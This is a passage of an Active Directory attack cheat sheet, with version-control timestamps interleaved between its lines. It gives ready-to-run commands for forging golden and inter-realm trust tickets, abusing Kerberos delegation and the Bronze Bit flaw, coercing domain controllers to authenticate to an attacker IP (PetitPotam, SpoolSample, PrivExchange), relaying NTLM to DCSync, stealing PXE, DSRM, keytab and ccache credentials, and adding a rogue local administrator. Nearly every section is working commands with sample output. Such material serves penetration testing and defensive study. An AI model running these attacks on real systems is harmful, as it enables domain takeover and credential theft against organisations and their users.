S-1-5-21-2941561648-383941485-1389968811-502
2020-02-23 20:20:46 +00:00
# with Impacket
lookupsid.py domain/user:password@10.10.10.10
2019-11-07 22:21:00 +00:00
```
- Replace 502 with 519 to represent Enterprise Admins
- Create golden ticket and attack parent domain.
```powershell
kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt
```
2020-08-18 07:33:38 +00:00
### Forest to Forest Compromise - Trust Ticket
2021-01-08 22:41:50 +00:00
* Require: SID filtering disabled
2020-12-08 13:31:01 +00:00
From the DC, dump the hash of the `currentdomain\targetdomain$` trust account using Mimikatz (e.g. with LSADump or DCSync). Then, using this trust key and the domain SIDs, forge an inter-realm TGT using
Mimikatz, adding the SID for the target domain's enterprise admins group to our **SID history** .
2020-08-18 07:33:38 +00:00
#### Dumping trust passwords (trust keys)
2021-01-08 22:41:50 +00:00
> Look for the trust name with a dollar ($) sign at the end. Most of the accounts with a trailing **$** are computer accounts, but some are trust accounts.
2020-08-18 07:33:38 +00:00
```powershell
lsadump::trust /patch
or find the TRUST_NAME$ machine account hash
```
#### Create a forged trust ticket (inter-realm TGT) using Mimikatz
```powershell
mimikatz(commandline) # kerberos::golden /domain:domain.local /sid:S-1-5-21... /rc4:HASH_TRUST$ /user:Administrator /service:krbtgt /target:external.com /ticket:c:\temp\trust.kirbi
2020-12-08 13:31:01 +00:00
mimikatz(commandline) # kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi
2020-08-18 07:33:38 +00:00
```
#### Use the Trust Ticket file to get a TGS for the targeted service
```powershell
2020-12-08 13:31:01 +00:00
.\asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local
.\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
2020-08-18 07:33:38 +00:00
```
Inject the TGS file and access the targeted service with the spoofed rights.
```powershell
kirbikator lsa .\ticket.kirbi
ls \\machine.domain.local\c$
```
2020-01-05 15:28:00 +00:00
### Kerberos Unconstrained Delegation
2019-07-17 21:17:35 +00:00
2020-02-29 11:56:00 +00:00
> The user sends a TGS to access the service, along with their TGT, and then the service can use the user's TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
2021-01-29 21:10:22 +00:00
> When a user authenticates to a computer that has unrestricted kerberos delegation privilege turned on, authenticated user's TGT ticket gets saved to that computer's memory.
2020-02-29 11:56:00 +00:00
:warning: Unconstrained delegation used to be the only option available in Windows 2000
2019-07-27 11:02:16 +00:00
2021-01-29 21:10:22 +00:00
#### SpoolService Abuse with Unconstrained Delegation
The goal is to gain DC Sync privileges using a computer account and the SpoolService bug.
2020-01-05 15:28:00 +00:00
2021-04-21 20:27:07 +00:00
**Requirements**:
2021-01-29 21:10:22 +00:00
- Object with Property **Trust this computer for delegation to any service (Kerberos only)**
- Must have **ADS_UF_TRUSTED_FOR_DELEGATION**
- Must not have **ADS_UF_NOT_DELEGATED** flag
- User must not be in the **Protected Users** group
- User must not have the flag **Account is sensitive and cannot be delegated**
2020-01-05 15:28:00 +00:00
2021-01-29 21:10:22 +00:00
##### Find delegation
2019-07-17 21:17:35 +00:00
2021-04-21 20:27:07 +00:00
:warning: : Domain controllers usually have unconstrained delegation enabled.
2019-07-17 21:17:35 +00:00
Check the `TrustedForDelegation` property.
2021-04-21 20:27:07 +00:00
* [ADModule ](https://github.com/samratashok/ADModule )
```powershell
# From https://github.com/samratashok/ADModule
PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True}
```
2019-07-17 21:17:35 +00:00
2021-04-21 20:27:07 +00:00
* [ldapdomaindump ](https://github.com/dirkjanm/ldapdomaindump )
```powershell
$> ldapdomaindump -u "DOMAIN\\Account" -p "Password123*" 10.10.10.10
grep TRUSTED_FOR_DELEGATION domain_computers.grep
```
2019-07-17 21:17:35 +00:00
2021-04-21 20:27:07 +00:00
* [CrackMapExec module ](https://github.com/byt3bl33d3r/CrackMapExec/wiki )
```powershell
cme ldap 10.10.10.10 -u username -p password --trusted-for-delegation
```
2021-01-29 21:10:22 +00:00
##### SpoolService status
Check if the spool service is running on the remote host
```powershell
ls \\dc01\pipe\spoolss
python rpcdump.py DOMAIN/user:password@10.10.10.10
```
##### Monitor with Rubeus
2019-07-17 21:17:35 +00:00
Monitor incoming connections from Rubeus.
```powershell
Rubeus.exe monitor /interval:1
```
2021-01-29 21:10:22 +00:00
##### Force a connect back from the DC
Due to the unconstrained delegation, the TGT of the computer account (DC$) will be saved in the memory of the computer with unconstrained delegation. By default the domain controller computer account has DCSync rights over the domain object.
2019-07-17 21:17:35 +00:00
2021-01-29 21:10:22 +00:00
> SpoolSample is a PoC to coerce a Windows host to authenticate to an arbitrary server using a "feature" in the MS-RPRN RPC interface.
2019-07-17 21:17:35 +00:00
```powershell
# From https://github.com/leechristensen/SpoolSample
.\SpoolSample.exe VICTIM-DC-NAME UNCONSTRAINED-SERVER-DC-NAME
.\SpoolSample.exe DC01.HACKER.LAB HELPDESK.HACKER.LAB
# DC01.HACKER.LAB is the domain controller we want to compromise
# HELPDESK.HACKER.LAB is the machine with delegation enabled that we control.
2021-01-29 21:10:22 +00:00
# From https://github.com/dirkjanm/krbrelayx
printerbug.py 'domain/username:password'@< VICTIM-DC-NAME > < UNCONSTRAINED-SERVER-DC-NAME >
# From https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc#gistcomment-2773689
python dementor.py -d domain -u username -p password < UNCONSTRAINED-SERVER-DC-NAME > < VICTIM-DC-NAME >
2019-07-17 21:17:35 +00:00
```
If the attack worked you should get a TGT of the domain controller.
2021-01-29 21:10:22 +00:00
##### Load the ticket
2019-07-17 21:17:35 +00:00
Extract the base64 TGT from Rubeus output and load it to our current session.
```powershell
.\Rubeus.exe asktgs /ticket:< ticket base64 > /ptt
```
2020-01-05 15:28:00 +00:00
Alternatively you could also grab the ticket using Mimikatz : `mimikatz # sekurlsa::tickets`
Then you can use DCsync or another attack : `mimikatz # lsadump::dcsync /user:HACKER\krbtgt`
2019-07-17 21:17:35 +00:00
2019-11-04 20:43:44 +00:00
2021-01-29 21:10:22 +00:00
##### Mitigation
2019-11-04 20:43:44 +00:00
* Ensure sensitive accounts cannot be delegated
* Disable the Print Spooler Service
2021-08-10 21:00:19 +00:00
#### MS-EFSRPC Abuse with Unconstrained Delegation
Using `PetitPotam` , another tool to coerce a callback from the targeted machine, instead of `SpoolSample` .
```powershell
# Coerce the callback
git clone https://github.com/topotam/PetitPotam
python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP
# Extract the ticket
.\Rubeus.exe asktgs /ticket:< ticket base64 > /ptt
```
2020-02-23 20:20:46 +00:00
### Kerberos Constrained Delegation
> Request a Kerberos ticket which allows us to exploit delegation configurations, we can once again use Impackets getST.py script, however,
Passing the -impersonate flag and specifying the user we wish to impersonate (any valid username).
```powershell
# Discover
$ Get-DomainComputer -TrustedToAuth | select -exp dnshostname
# Find the service
$ Get-DomainComputer previous_result | select -exp msds-AllowedToDelegateTo
2021-03-25 17:25:02 +00:00
```
2020-02-23 20:20:46 +00:00
2021-08-10 21:00:19 +00:00
#### Exploit the Constrained Delegation
2020-02-23 20:20:46 +00:00
2021-08-10 21:00:19 +00:00
* Impacket
```ps1
$ getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10
```
* Rubeus
```ps1
$ ./Rubeus.exe tgtdeleg /nowrap # this ticket can be used with /ticket:...
$ ./Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt
$ ./Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt
$ dir \\dc.domain.com\c$
```
2020-02-23 20:20:46 +00:00
2021-03-25 17:25:02 +00:00
#### Impersonate a domain user on a resource
Require:
* SYSTEM level privileges on a machine configured with constrained delegation
```ps1
PS> [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') | out-null
PS> $idToImpersonate = New-Object System.Security.Principal.WindowsIdentity @('administrator')
PS> $idToImpersonate.Impersonate()
PS> [System.Security.Principal.WindowsIdentity]::GetCurrent() | select name
PS> ls \\dc01.offense.local\c$
```
2020-02-23 20:20:46 +00:00
2020-01-05 15:28:00 +00:00
### Kerberos Resource Based Constrained Delegation
2019-07-17 21:17:35 +00:00
2019-07-27 11:02:16 +00:00
Resource-based Constrained Delegation was introduced in Windows Server 2012.
> The user sends a TGS to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a TGS for the user to Service B. https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
2019-07-22 19:45:50 +00:00
1. Import **Powermad** and **Powerview**
```powershell
PowerShell.exe -ExecutionPolicy Bypass
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
```
2. Get user SID
```powershell
$AttackerSID = Get-DomainUser SvcJoinComputerToDom -Properties objectsid | Select -Expand objectsid
$ACE = Get-DomainObjectACL dc01-ww2.factory.lan | ?{$_.SecurityIdentifier -match $AttackerSID}
$ACE
ConvertFrom-SID $ACE.SecurityIdentifier
```
3. Abuse **MachineAccountQuota** to create a computer account and set an SPN for it
```powershell
New-MachineAccount -MachineAccount swktest -Password $(ConvertTo-SecureString 'Weakest123*' -AsPlainText -Force)
```
4. Rewrite DC's **AllowedToActOnBehalfOfOtherIdentity** properties
```powershell
$ComputerSid = Get-DomainComputer swktest -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer dc01-ww2.factory.lan | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
$RawBytes = Get-DomainComputer dc01-ww2.factory.lan -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
$Descriptor.DiscretionaryAcl
```
2020-12-09 22:33:40 +00:00
```ps1
# alternative
$SID_FROM_PREVIOUS_COMMAND = Get-DomainComputer MACHINE_ACCOUNT_NAME -Properties objectsid | Select -Expand objectsid
2021-05-06 16:26:00 +00:00
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$SID_FROM_PREVIOUS_COMMAND)"; $SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0); Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
2020-12-09 22:33:40 +00:00
# alternative
2021-05-06 16:26:00 +00:00
StandIn_Net35.exe --computer dc01 --sid SID_FROM_PREVIOUS_COMMAND
2020-12-09 22:33:40 +00:00
```
2019-07-22 19:45:50 +00:00
5. Use Rubeus to get hash from password
```powershell
2020-12-17 07:56:58 +00:00
Rubeus.exe hash /password:'Weakest123*' /user:swktest$ /domain:factory.lan
2019-07-22 19:45:50 +00:00
[*] Input password : Weakest123*
2020-12-17 07:56:58 +00:00
[*] Input username : swktest$
2019-07-22 19:45:50 +00:00
[*] Input domain : factory.lan
[*] Salt : FACTORY.LANswktest
[*] rc4_hmac : F8E064CA98539B735600714A1F1907DD
[*] aes128_cts_hmac_sha1 : D45DEADECB703CFE3774F2AA20DB9498
[*] aes256_cts_hmac_sha1 : 0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347
[*] des_cbc_md5 : BA297CFD07E62A5E
```
6. Impersonate domain admin using our newly created machine account
```powershell
2020-12-09 22:33:40 +00:00
.\Rubeus.exe s4u /user:swktest$ /rc4:F8E064CA98539B735600714A1F1907DD /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap
2020-12-17 07:56:58 +00:00
.\Rubeus.exe s4u /user:swktest$ /aes256:0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap
2019-07-22 19:45:50 +00:00
[*] Impersonating user 'Administrator' to target SPN 'cifs/dc01-ww2.factory.lan'
[*] Using domain controller: DC01-WW2.factory.lan (172.16.42.5)
[*] Building S4U2proxy request for service: 'cifs/dc01-ww2.factory.lan'
[*] Sending S4U2proxy request
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc01-ww2.factory.lan':
doIGXDCCBligAwIBBaEDAgEWooIFXDCCBVhhggVUMIIFUKADAgEFoQ0bC0ZBQ1RPUlkuTEFOoicwJaAD
AgECoR4wHBsEY2lmcxsUZGMwMS[...]PMIIFC6ADAgESoQMCAQOiggT9BIIE
LmZhY3RvcnkubGFu
[*] Action: Import Ticket
[+] Ticket successfully imported!
```
2020-12-18 21:38:30 +00:00
### Kerberos Bronze Bit Attack - CVE-2020-17049
> An attacker can impersonate users which are not allowed to be delegated. This includes members of the **Protected Users** group and any other users explicitly configured as **sensitive and cannot be delegated**.
> Patch is out on November 10, 2020, DC are most likely vulnerable until [February 2021](https://support.microsoft.com/en-us/help/4598347/managing-deployment-of-kerberos-s4u-changes-for-cve-2020-17049).
:warning: Patched Error Message : `[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)`
Requirements:
* Service account's password hash
* Service account's with `Constrained Delegation` or `Resource Based Constrained Delegation`
* [Impacket PR #1013 ](https://github.com/SecureAuthCorp/impacket/pull/1013 )
**Attack #1 ** - Bypass the `Trust this user for delegation to specified services only – Use Kerberos only` protection and impersonate a user who is protected from delegation.
```powershell
# forwardable flag is only protected by the ticket encryption which uses the service account's password
$ getST.py -spn cifs/Service2.test.local -impersonate Administrator -hashes < LM:NTLM hash > -aesKey < AES hash > test.local/Service1 -force-forwardable -dc-ip < Domain controller > # -> Forwardable
$ getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes aad3b435b51404eeaad3b435b51404ee:7c1673f58e7794c77dead3174b58b68f -aesKey 4ffe0c458ef7196e4991229b0e1c4a11129282afb117b02dc2f38f0312fc84b4 test.local/Service1 -force-forwardable
# Load the ticket
.\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit
# Access "c$"
ls \\service2.test.local\c$
```
**Attack #2 ** - Write Permissions to one or more objects in the AD
```powershell
# Create a new machine account
Import-Module .\Powermad\powermad.ps1
New-MachineAccount -MachineAccount AttackerService -Password $(ConvertTo-SecureString 'AttackerServicePassword' -AsPlainText -Force)
.\mimikatz\mimikatz.exe "kerberos::hash /password:AttackerServicePassword /user:AttackerService /domain:test.local" exit
# Set PrincipalsAllowedToDelegateToAccount
Install-WindowsFeature RSAT-AD-PowerShell
Import-Module ActiveDirectory
Get-ADComputer AttackerService
Set-ADComputer Service2 -PrincipalsAllowedToDelegateToAccount AttackerService$
Get-ADComputer Service2 -Properties PrincipalsAllowedToDelegateToAccount
# Execute the attack
python .\impacket\examples\getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes 830f8df592f48bc036ac79a2bb8036c5:830f8df592f48bc036ac79a2bb8036c5 -aesKey 2a62271bdc6226c1106c1ed8dcb554cbf46fb99dda304c472569218c125d9ffc test.local/AttackerService -force-forwardableet-ADComputer Service2 -PrincipalsAllowedToDelegateToAccount AttackerService$
# Load the ticket
.\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit | Out-Null
```
2019-02-10 18:51:54 +00:00
### PrivExchange attack
2019-07-24 12:10:58 +00:00
Exchange your privileges for Domain Admin privs by abusing Exchange.
:warning: You need a shell on a user account with a mailbox.
1. Exchange server hostname or IP address
```bash
pth-net rpc group members "Exchange Servers" -I dc01.domain.local -U domain/username
```
2. Relay of the Exchange server authentication and privilege escalation (using ntlmrelayx from Impacket).
```powershell
ntlmrelayx.py -t ldap://dc01.domain.local --escalate-user username
```
3. Subscription to the push notification feature (using privexchange.py or powerPriv), uses the credentials of the current user to authenticate to the Exchange server. Forcing the Exchange server's to send back its NTLMv2 hash to a controlled machine.
2019-02-10 18:51:54 +00:00
```bash
# https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py
python privexchange.py -ah xxxxxxx -u xxxx -d xxxxx
2019-07-24 12:10:58 +00:00
python privexchange.py -ah 10.0.0.2 mail01.domain.local -d domain.local -u user_exchange -p pass_exchange
2019-02-10 18:51:54 +00:00
# https://github.com/G0ldenGunSec/PowerPriv
powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016
```
2019-07-24 12:10:58 +00:00
4. Profit using secretdumps from Impacket, the user can now perform a dcsync and get another user's NTLM hash
2019-02-10 18:51:54 +00:00
```bash
python secretsdump.py xxxxxxxxxx -just-dc
2019-07-24 12:10:58 +00:00
python secretsdump.py lab/buff@192.168.0.2 -ntds ntds -history -just-dc-ntlm
```
5. Clean your mess and restore a previous state of the user's ACL
```powershell
python aclpwn.py --restore ../aclpwn-20190319-125741.restore
2019-02-10 18:51:54 +00:00
```
2019-02-26 16:24:10 +00:00
Alternatively you can use the Metasploit module
[`use auxiliary/scanner/http/exchange_web_server_pushsubscription` ](https://github.com/rapid7/metasploit-framework/pull/11420 )
2019-11-07 22:21:00 +00:00
Alternatively you can use an all-in-one tool : Exchange2domain.
```powershell
git clone github.com/Ridter/Exchange2domain
python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServerip
python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip
```
2019-07-25 12:08:32 +00:00
### PXE Boot image attack
PXE allows a workstation to boot from the network by retrieving an operating system image from a server using TFTP (Trivial FTP) protocol. This boot over the network allows an attacker to fetch the image and interact with it.
- Press ** [F8]** during the PXE boot to spawn an administrator console on the deployed machine.
- Press ** [SHIFT+F10]** during the initial Windows setup process to bring up a system console, then add a local administrator or dump SAM/SYSTEM registry.
```powershell
net user hacker Password123! /add
net localgroup administrators /add hacker
```
- Extract the pre-boot image (wim files) using [PowerPXE.ps1 (https://github.com/wavestone-cdt/powerpxe) ](https://github.com/wavestone-cdt/powerpxe ) and dig through it to find default passwords and domain accounts.
```powershell
# Import the module
PS > Import-Module .\PowerPXE.ps1
# Start the exploit on the Ethernet interface
PS > Get-PXEcreds -InterfaceAlias Ethernet
PS > Get-PXECreds -InterfaceAlias « lab 0 »
# Wait for the DHCP to get an address
2020-10-17 20:47:20 +00:00
>> Get a valid IP address
2019-07-25 12:08:32 +00:00
>>> >>> DHCP proposal IP address: 192.168.22.101
>>> >>> DHCP Validation: DHCPACK
>>> >>> IP address configured: 192.168.22.101
# Extract BCD path from the DHCP response
>> Request BCD File path
>>> >>> BCD File path: \Tmp\x86x64{5AF4E332-C90A-4015-9BA2-F8A7C9FF04E6}.bcd
>>> >>> TFTP IP Address: 192.168.22.3
# Download the BCD file and extract wim files
>> Launch TFTP download
>>>> Transfer succeeded.
>> Parse the BCD file: conf.bcd
>>>> Identify wim file : \Boot\x86\Images\LiteTouchPE_x86.wim
>>>> Identify wim file : \Boot\x64\Images\LiteTouchPE_x64.wim
>> Launch TFTP download
>>>> Transfer succeeded.
# Parse wim files to find interesting data
>> Open LiteTouchPE_x86.wim
>>>> Finding Bootstrap.ini
>>>> >>>> DeployRoot = \\LAB-MDT\DeploymentShare$
>>>> >>>> UserID = MdtService
>>>> >>>> UserPassword = Somepass1
```
2021-06-28 20:08:06 +00:00
### DNS Reconnaissance
Perform ADIDNS searches
```powershell
StandIn.exe --dns --limit 20
StandIn.exe --dns --filter SQL --limit 10
StandIn.exe --dns --forest --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
StandIn.exe --dns --legacy --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
```
2021-01-08 22:41:50 +00:00
### DSRM Credentials
> Directory Services Restore Mode (DSRM) is a safe mode boot option for Windows Server domain controllers. DSRM allows an administrator to repair or recover to repair or restore an Active Directory database.
This is the local administrator account inside each DC. Having admin privileges in this machine, you can use mimikatz to dump the local Administrator hash. Then, modifying a registry to activate this password so you can remotely access to this local Administrator user.
```ps1
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
# Check if the key exists and get the value
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior
# Create key with value "2" if it doesn't exist
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD
# Change value to "2"
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2
```
2019-07-25 12:08:32 +00:00
2019-11-04 20:43:44 +00:00
### Impersonating Office 365 Users on Azure AD Connect
Prerequisites:
* Obtain NTLM password hash of the AZUREADSSOACC account
```powershell
mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit
```
* AAD logon name of the user we want to impersonate (userPrincipalName or mail)
```powershell
elrond@contoso.com
```
* SID of the user we want to impersonate
```powershell
S-1-5-21-2121516926-2695913149-3163778339-1234
```
Create the Silver Ticket and inject it into Kerberos cache:
```powershell
mimikatz.exe "kerberos::golden /user:elrond
/sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234
/domain:contoso.local /rc4:f9969e088b2c13d93833d0ce436c76dd
/target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit
```
Launch Mozilla Firefox, go to about:config
```powershell
network.negotiate-auth.trusted-uris="https://aadg.windows.net.nsatc.net,https://autologon.microsoftazuread-sso.com".
```
Navigate to any web application that is integrated with our AAD domain. Once at the Office365 logon screen, fill in the user name, while leaving the password field empty. Then press TAB or ENTER.
2019-11-25 22:12:06 +00:00
## Linux Active Directory
### CCACHE ticket reuse from /tmp
> When tickets are set to be stored as a file on disk, the standard format and type is a CCACHE file. This is a simple binary file format to store Kerberos credentials. These files are typically stored in /tmp and scoped with 600 permissions
2021-07-12 18:45:16 +00:00
List the current ticket used for authentication with `env | grep KRB5CCNAME` . The format is portable and the ticket can be reused by setting the environment variable with `export KRB5CCNAME=/tmp/ticket.ccache` . Kerberos ticket name format is `krb5cc_%{uid}` where uid is the user UID.
```powershell
$ ls /tmp/ | grep krb5cc
krb5cc_1000
krb5cc_1569901113
krb5cc_1569901115
$ export KRB5CCNAME=/tmp/krb5cc_1569901115
```
2019-11-25 22:12:06 +00:00
### CCACHE ticket reuse from keyring
Tool to extract Kerberos tickets from Linux kernel keys : https://github.com/TarlogicSecurity/tickey
```powershell
2021-07-12 18:45:16 +00:00
# Configuration and build
git clone https://github.com/TarlogicSecurity/tickey
cd tickey/tickey
make CONF=Release
2019-11-25 22:12:06 +00:00
[root@Lab-LSV01 /]# /tmp/tickey -i
[*] krb5 ccache_name = KEYRING:session:sess_%{uid}
[+] root detected, so... DUMP ALL THE TICKETS!!
[*] Trying to inject in tarlogic[1000] session...
[+] Successful injection at process 25723 of tarlogic[1000],look for tickets in /tmp/__krb_1000.ccache
[*] Trying to inject in velociraptor[1120601115] session...
[+] Successful injection at process 25794 of velociraptor[1120601115],look for tickets in /tmp/__krb_1120601115.ccache
[*] Trying to inject in trex[1120601113] session...
[+] Successful injection at process 25820 of trex[1120601113],look for tickets in /tmp/__krb_1120601113.ccache
[X] [uid:0] Error retrieving tickets
```
2021-06-24 13:26:05 +00:00
### CCACHE ticket reuse from SSSD KCM
SSSD maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb` .
The corresponding key is stored as a hidden file at the path `/var/lib/sss/secrets/.secrets.mkey` .
By default, the key is only readable if you have **root** permissions.
Invoking `SSSDKCMExtractor` with the --database and --key parameters will parse the database and decrypt the secrets.
```powershell
git clone https://github.com/fireeye/SSSDKCMExtractor
python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey
```
The credential cache Kerberos blob can be converted into a usable Kerberos CCache file that can be passed to Mimikatz/Rubeus.
2019-11-25 22:12:06 +00:00
### CCACHE ticket reuse from keytab
```powershell
git clone https://github.com/its-a-feature/KeytabParser
python KeytabParser.py /etc/krb5.keytab
klist -k /etc/krb5.keytab
```
### Extract accounts from /etc/krb5.keytab
The service keys used by services that run as root are usually stored in the keytab file /etc/krb5.keytab. This service key is the equivalent of the service's password, and must be kept secure.
Use [`klist` ](https://adoptopenjdk.net/?variant=openjdk13&jvmVariant=hotspot ) to read the keytab file and parse its content. The key that you see when the [key type ](https://cwiki.apache.org/confluence/display/DIRxPMGT/Kerberos+EncryptionKey ) is 23 is the actual NT Hash of the user.
```powershell
$ klist.exe -t -K -e -k FILE:C:\Users\User\downloads\krb5.keytab
[...]
[26] Service principal: host/COMPUTER@DOMAIN
KVNO: 25
Key type: 23
2020-10-15 10:35:05 +00:00
Key: 31d6cfe0d16ae931b73c59d7e0c089c0
2019-11-25 22:12:06 +00:00
Time stamp: Oct 07, 2019 09:12:02
[...]
```
2020-10-15 10:35:05 +00:00
On Linux you can use [`KeyTabExtract` ](https://github.com/sosdave/KeyTabExtract ): we want RC4 HMAC hash to reuse the NLTM hash.
```powershell
$ python3 keytabextract.py krb5.keytab
[!] No RC4-HMAC located. Unable to extract NTLM hashes. # No luck
[+] Keytab File successfully imported.
REALM : DOMAIN
SERVICE PRINCIPAL : host/computer.domain
NTLM HASH : 31d6cfe0d16ae931b73c59d7e0c089c0 # Lucky
```
2019-11-25 22:12:06 +00:00
On macOS you can use `bifrost` .
```powershell
./bifrost -action dump -source keytab -path test
```
Connect to the machine using the account and the hash with CME.
```powershell
2020-10-15 10:35:05 +00:00
$ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "31d6cfe0d16ae931b73c59d7e0c089c0" -d "DOMAIN"
CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae931b73c59d7e0c089c0
2019-11-25 22:12:06 +00:00
```
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
2020-06-18 09:55:48 +00:00
* [Explain like I’ m 5: Kerberos - Apr 2, 2013 - @roguelynn ](https://www.roguelynn.com/words/explain-like-im-5-kerberos/ )
2019-11-04 20:43:44 +00:00
* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter ](#https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/ )
2019-07-25 12:08:32 +00:00
* [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema ](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin )
* [Abusing Kerberos: Kerberoasting - Haboob Team ](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf )
* [Abusing S4U2Self: Another Sneaky Active Directory Persistence - Alsid ](https://alsid.com/company/news/abusing-s4u2self-another-sneaky-active-directory-persistence )
* [Attacks Against Windows PXE Boot Images - February 13th, 2018 - Thomas Elling ](https://blog.netspi.com/attacks-against-windows-pxe-boot-images/ )
2019-07-22 19:45:50 +00:00
* [BUILDING AND ATTACKING AN ACTIVE DIRECTORY LAB WITH POWERSHELL - @myexploit2600 & @5ub34x ](https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell/ )
* [Becoming Darth Sidious: Creating a Windows Domain (Active Directory) and hacking it - @chryzsh ](https://chryzsh.gitbooks.io/darthsidious/content/building-a-lab/building-a-lab/building-a-small-lab.html )
2019-07-25 12:08:32 +00:00
* [BlueHat IL - Benjamin Delpy ](https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/BenjaminDelpy.pdf )
* [COMPROMISSION DES POSTES DE TRAVAIL GRÂCE À LAPS ET PXE MISC n° 103 - mai 2019 - Rémi Escourrou, Cyprien Oger ](https://connect.ed-diamond.com/MISC/MISC-103/Compromission-des-postes-de-travail-grace-a-LAPS-et-PXE )
* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss ](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf )
* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction ](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ )
* [Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin ](https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin/ )
2018-08-12 21:30:22 +00:00
* [Dumping Domain Password Hashes - Pentestlab ](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/ )
2019-07-25 12:08:32 +00:00
* [Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace ](https://zachgrace.com/posts/exploiting-ms14-068/ )
